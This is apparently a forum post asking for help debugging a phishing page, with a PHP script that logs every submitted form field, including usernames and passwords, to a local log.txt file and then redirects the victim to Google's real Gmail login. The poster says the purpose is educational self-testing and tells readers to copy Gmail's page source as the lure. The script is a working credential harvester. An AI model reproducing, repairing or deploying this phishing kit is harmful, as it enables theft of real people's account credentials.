First of all i would like to say that i only learn this for educational and for my own security knowledge.
I run a LAMPserver of my own and i tried to hack myself with a phishing page.The thing i wanted is the following.
When the user logs into my phishing page,it has to write his username and password into a file named log.txt and redirect to the original page of that website.
I wrote a php script but it partially works.
That is, after receiving his username and password, it redirects the user to the original page but it doesnt write the log.txt.
I attached the php and html files with this.
Also i copied the php script for easy access.
php script:
Code: Select all
<?php
header ('Location: https://www.google.com/accounts/ServiceLoginAuth?service=mail ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>the same as gmail.com html
right click gmail.com and view page source.
Thank you.
Please help me to succeed with log.txt